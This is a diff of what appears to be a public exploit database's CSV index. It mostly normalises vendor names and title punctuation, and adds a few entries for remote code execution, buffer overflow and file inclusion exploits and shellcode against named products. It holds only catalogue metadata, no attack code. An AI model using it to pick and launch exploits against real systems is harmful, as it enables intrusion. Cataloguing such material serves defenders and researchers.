-38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default - WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0
+38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router - Default WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0
 38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0
 38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0
 38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0
@@ -15497,13 +15498,13 @@ id,file,description,date,author,platform,type,port
 38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)",2015-12-15,Metasploit,jsp,remote,8020
 38983,platforms/java/remote/38983.rb,"Jenkins CLI - RMI Java Deserialization (Metasploit)",2015-12-15,Metasploit,java,remote,8080
 39007,platforms/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0
-39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80
+39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80
 39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80
 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0
 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0
 39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0
 39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",multiple,remote,0
-39089,platforms/hardware/remote/39089.txt,"Netgear D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0
+39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0
 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0
 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0
 39119,platforms/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p (Windows XP/7/10) - Chat Remote Buffer Overflow (SEH)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
@@ -15538,7 +15539,7 @@ id,file,description,date,author,platform,type,port
 39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0
 39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,linux,remote,0
 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80
-39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
+39515,platforms/windows/remote/39515.rb,"NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
 39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0
 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80
 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443
@@ -15603,7 +15604,7 @@ id,file,description,date,author,platform,type,port
 40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000
 40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000
 40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80
-40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
+40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
 40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0
 40280,platforms/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0
@@ -15655,8 +15656,8 @@ id,file,description,date,author,platform,type,port
 40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
 40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40735,platforms/hardware/remote/40735.txt,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
-40736,platforms/hardware/remote/40736.txt,"NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
-40737,platforms/hardware/remote/40737.sh,"NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
+40736,platforms/hardware/remote/40736.txt,"NETGEAR JNR1010 ADSL Router - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
+40737,platforms/hardware/remote/40737.sh,"NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40738,platforms/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547
 40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0
@@ -15711,7 +15712,7 @@ id,file,description,date,author,platform,type,port
 41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
 41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
 41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
-41598,platforms/cgi/remote/41598.rb,"Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80
+41598,platforms/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80
 41613,platforms/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,windows,remote,8800
 41614,platforms/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,multiple,remote,8080
 41638,platforms/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,windows,remote,0
@@ -15725,11 +15726,12 @@ id,file,description,date,author,platform,type,port
 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
-42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
+42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
 42756,platforms/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote,0
 42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
 42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0
+42779,platforms/linux/remote/42779.rb,"Supervisor 3.0a1 - 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)",2017-09-25,Metasploit,linux,remote,9001
 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
@@ -15791,18 +15793,18 @@ id,file,description,date,author,platform,type,port
 42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0
 42222,platforms/windows/remote/42222.py,"SpyCamLizard 1.230 - Buffer Overflow",2017-06-20,abatchy17,windows,remote,0
 42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443
-42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80
+42257,platforms/cgi/remote/42257.rb,"NETGEAR DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80
 42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000
 42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0
 42288,platforms/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443
 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778
 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
-42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
+42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
 42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
 42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0
-42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0
+42331,platforms/hardware/remote/42331.txt,"Belkin F7D7601 NetCam - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0
 42394,platforms/java/remote/42394.py,"Jenkins < 1.650 - Java Deserialization",2017-07-30,"Janusz Piechówka",java,remote,0
 42349,platforms/android/remote/42349.txt,"SKILLS.com.au Industry App - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0
 42350,platforms/android/remote/42350.txt,"Virtual Postage (VPA) - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0
@@ -15826,7 +15828,7 @@ id,file,description,date,author,platform,type,port
 42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",php,remote,0
 42693,platforms/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
 42694,platforms/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,46824
-42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0
+42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0
 42696,platforms/windows/remote/42696.rb,"Motorola Netopia Netoctopus SDCS - Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,3814
 42697,platforms/linux/remote/42697.rb,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)",2014-08-14,"James Fitts",linux,remote,0
 42698,platforms/jsp/remote/42698.rb,"Infinite Automation Mango Automation - Command Injection (Metasploit)",2017-09-13,"James Fitts",jsp,remote,0
@@ -15847,7 +15849,9 @@ id,file,description,date,author,platform,type,port
 42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69
 42726,platforms/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",hardware,remote,0
 42753,platforms/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor",2017-05-19,"Simon Brannstrom",multiple,remote,0
+42778,platforms/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80
 42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80
+42780,platforms/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -16903,7 +16907,7 @@ id,file,description,date,author,platform,type,port
 1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0
 1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' Parameter SQL Injection",2006-05-16,rgod,php,webapps,0
 1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - 'Attachment mod_mime' Remote Exploit",2006-05-16,rgod,php,webapps,0
-1798,platforms/php/webapps/1798.txt,"Quezza BB 1.0 - (quezza_root_path) File Inclusion",2006-05-17,nukedx,php,webapps,0
+1798,platforms/php/webapps/1798.txt,"Quezza BB 1.0 - 'quezza_root_path' File Inclusion",2006-05-17,nukedx,php,webapps,0
 1800,platforms/php/webapps/1800.txt,"ScozNews 1.2.1 - 'mainpath' Remote File Inclusion",2006-05-17,Kacper,php,webapps,0
 1804,platforms/php/webapps/1804.txt,"phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass",2006-05-19,[Oo],php,webapps,0
 1805,platforms/php/webapps/1805.pl,"phpListPro 2.0.1 - 'Language' Remote Code Execution",2006-05-19,[Oo],php,webapps,0
@@ -16993,7 +16997,7 @@ id,file,description,date,author,platform,type,port
 1907,platforms/php/webapps/1907.txt,"aWebNews 1.5 - 'visview.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0
 1908,platforms/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - 'phpbb_root_path' File Inclusion",2006-06-13,Kacper,php,webapps,0
 1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution",2006-06-13,"Javier Olascoaga",php,webapps,0
-1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - (destination) File Inclusion",2006-06-14,Kacper,php,webapps,0
+1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - 'destination' File Inclusion",2006-06-14,Kacper,php,webapps,0
 1913,platforms/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - 'template.php' File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0
 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0
 1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Parameter Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0
@@ -17286,7 +17290,7 @@ id,file,description,date,author,platform,type,port
 2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - (base) Remote File Inclusion",2006-09-08,ddoshomo,php,webapps,0
 2336,platforms/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - (root_dir) Remote File Inclusion",2006-09-09,Kacper,php,webapps,0
 2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager 3.2 - 'id' SQL Injection",2006-09-09,MercilessTurk,php,webapps,0
-2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - (classified_path) File Inclusion",2006-09-09,MercilessTurk,php,webapps,0
+2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - 'classified_path' File Inclusion",2006-09-09,MercilessTurk,php,webapps,0
 2340,platforms/php/webapps/2340.txt,"PUMA 1.0 RC 2 - 'config.php' Remote File Inclusion",2006-09-10,"Philipp Niedziela",php,webapps,0
 2341,platforms/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - 'ROOT_PATH' File Inclusion",2006-09-10,Eddy_BAck0o,php,webapps,0
 2342,platforms/php/webapps/2342.txt,"mcGalleryPRO 2006 - (path_to_folder) Remote File Inclusion",2006-09-10,Solpot,php,webapps,0
@@ -17388,7 +17392,7 @@ id,file,description,date,author,platform,type,port
 2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - 'pdf.php' Remote File Inclusion",2006-09-29,Kacper,php,webapps,0
 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - 'display.php' SQL Injection",2006-09-29,Trex,php,webapps,0
 2457,platforms/php/webapps/2457.php,"UBBCentral UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution",2006-09-29,"HACKERS PAL",php,webapps,0
-2459,platforms/php/webapps/2459.txt,"Forum82 < 2.5.2b - (repertorylevel) Multiple File Inclusion",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0
+2459,platforms/php/webapps/2459.txt,"Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusion",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0
 2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - 'yesno.phtml' Remote File Inclusion",2006-09-30,Drago84,php,webapps,0
 2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0
 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion",2006-10-01,Kacper,php,webapps,0
@@ -17416,10 +17420,10 @@ id,file,description,date,author,platform,type,port
 2490,platforms/php/webapps/2490.txt,"Freenews 1.1 - 'moteur.php' Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0
 2491,platforms/php/webapps/2491.pl,"PHPPC 1.03 RC1 - '/lib/functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0
 2493,platforms/php/webapps/2493.pl,"docmint 2.0 - 'engine/require.php' Remote File Inclusion",2006-10-09,K-159,php,webapps,0
-2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0
-2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0
-2496,platforms/php/webapps/2496.txt,"WebYep 1.1.9 - (webyep_sIncludePath) File Inclusion",2006-10-09,the_day,php,webapps,0
-2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0
+2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps,0
+2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps,0
+2496,platforms/php/webapps/2496.txt,"WebYep 1.1.9 - 'webyep_sIncludePath' File Inclusion",2006-10-09,the_day,php,webapps,0
+2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps,0
 2498,platforms/php/webapps/2498.php,"Flatnuke 2.5.8 - 'file()' Privilege Escalation / Code Execution",2006-10-10,rgod,php,webapps,0
 2499,platforms/php/webapps/2499.php,"Flatnuke 2.5.8 - (userlang) Local Inclusion / Delete All Users Exploit",2006-10-10,rgod,php,webapps,0
 2500,platforms/php/webapps/2500.pl,"phpMyAgenda 3.1 - 'templates/header.php3' Local File Inclusion",2006-10-10,"Nima Salehi",php,webapps,0
@@ -17454,7 +17458,7 @@ id,file,description,date,author,platform,type,port
 2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0
 2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 - (lang_prefix) Remote File Inclusion",2006-10-12,r0ut3r,php,webapps,0
 2535,platforms/php/webapps/2535.txt,"PHPMyConferences 8.0.2 - 'menu.inc.php' File Inclusion",2006-10-13,k1tk4t,php,webapps,0
-2536,platforms/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - (fullpath) File Inclusion",2006-10-13,k1tk4t,php,webapps,0
+2536,platforms/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - 'fullpath' File Inclusion",2006-10-13,k1tk4t,php,webapps,0
 2537,platforms/php/webapps/2537.pl,"maluinfo 206.2.38 - 'bb_usage_stats.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2538,platforms/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - 'constants.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2539,platforms/php/webapps/2539.txt,"Genepi 1.6 - 'genepi.php' Remote File Inclusion",2006-10-13,Kw3[R]Ln,php,webapps,0
@@ -17520,7 +17524,7 @@ id,file,description,date,author,platform,type,port
 2612,platforms/php/webapps/2612.txt,"PGOSD - 'misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0
 2613,platforms/php/webapps/2613.txt,"Mambo Module MambWeather 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0
 2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - 'DNS/RR.php' Remote File Inclusion",2006-10-22,Drago84,php,webapps,0
-2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion",2006-10-22,k1tk4t,php,webapps,0
+2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - 'SPEEDBERG_PATH' File Inclusion",2006-10-22,k1tk4t,php,webapps,0
 2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - 'delete.php' Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0
 2617,platforms/php/webapps/2617.php,"PHP-Nuke 7.9 - (Encyclopedia) SQL Injection",2006-10-22,Paisterist,php,webapps,0
 2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - 'common.php' Remote File Inclusion",2006-10-22,"the master",php,webapps,0
@@ -17552,7 +17556,7 @@ id,file,description,date,author,platform,type,port
 2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - SQL Injection",2006-10-27,w4ck1ng,php,webapps,0
 2661,platforms/asp/webapps/2661.asp,"PHP League 0.82 - 'classement.php' SQL Injection",2006-10-27,ajann,asp,webapps,0
 2662,platforms/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Unauthenticated Access",2006-10-27,"Soroush Dalili",asp,webapps,0
-2663,platforms/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - (PS_BASE) File Inclusion",2006-10-28,"Cold Zero",php,webapps,0
+2663,platforms/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion",2006-10-28,"Cold Zero",php,webapps,0
 2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - 'viewticket.php' Local File Inclusion",2006-10-28,Kw3[R]Ln,php,webapps,0
 2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0
 2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - 'Core/core.inc.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0
@@ -17638,7 +17642,7 @@ id,file,description,date,author,platform,type,port
 2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - 'save_profile.asp' Pass Change Exploit",2006-11-13,ajann,asp,webapps,0
 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0
 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Login Bypass",2006-11-13,ajann,asp,webapps,0
-2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Inclusion",2006-11-13,Firewall,php,webapps,0
+2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,php,webapps,0
 2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps,0
 2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - (DIR) Remote File Inclusion",2006-11-14,navairum,php,webapps,0
 2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - 'Inspect.php' Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0
@@ -17852,7 +17856,7 @@ id,file,description,date,author,platform,type,port
 3095,platforms/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 SQL Injection",2007-01-07,"Stefan Esser",php,webapps,0
 3096,platforms/php/webapps/3096.txt,"AllMyLinks 0.5.0 - 'index.php' Remote File Inclusion",2007-01-07,GoLd_M,php,webapps,0
